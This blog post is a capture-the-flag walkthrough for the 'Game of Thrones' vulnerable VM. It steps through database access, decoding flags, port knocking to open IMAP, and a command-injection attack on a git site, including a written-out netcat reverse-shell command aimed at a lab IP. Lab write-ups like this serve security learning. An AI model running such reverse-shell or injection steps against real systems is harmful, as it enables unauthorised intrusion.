Hack the Gamee of Thrones VM (CTF challenge part 2)

at 1:47 AM Thursday, February 15, 2018


We use login the username and password we find in the TXT records.



We use the search provided by the site to check for vulnerabilities.



We use the file manager module and it opened a file manager that lets us access few files.




In /home/aryastark folder we find a file called flag.txt

We download the file and open it in our system and find our 4th flag.




Now we got a hint to access a database now we know the server is running postgresql, we connect to it using the username password available in the file we find earlier.

psql –h 192.168.1.133 –u robinarryn –d mountainandthevale

We find a table called flag, we open it and find a base64 encoded string.




We decode the base64 encode string and find our 5th flag.
Now we check the other tables to check if we miss anything. In one of the tables we find a few names
Select * from arya_kill_list
In arya_kill_list we find these names that seems useful.





Searching through the database we find a rot16 encoded string.




We now convert the rot16 encoded flag and find a name of database along with the password. It also gives us a hint to use the username we find in the table above.

After enumerating the username we find that TheRedWomanMelisandre is the username.




Now we check the the table and find a secret flag. 



Now we know kingdom of reach is in imap as it was shown in the map, now we use the number we find earlier to port knock.

knock 192.168.1.133 3487 64535 12345




Now we do a nmap scan to check if any new port opened on the server, we find that port 143 that is running imap opened.
We use netcat to connect to it, we use the username and password we find in the hint earlier.



 

In the inbox we find our 6th flag, we also get a hint to use port 1337 and a username and password is given to login.


We login into the site and find that it is git site. 


 
After enumerating through the files we find that this site is vulnerable to command injection and a hint to use mysql.


 


 


We use netcat to get reverse shell on the site we use “”`code` to execute our code.
nc –e /bin/bash 192.168.1.116 1234


Now we setup our listener using netcat as soon as we execute our command we get a reverse shell.


On the webpage earlier we find hex encoded string when we decode it we get a location of a file:/home/tyrionlannister/checkpoint.txt, so we open it and find username, password and name of the database we need to look for.



Now we use the information above to find the tables available in the database.


0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)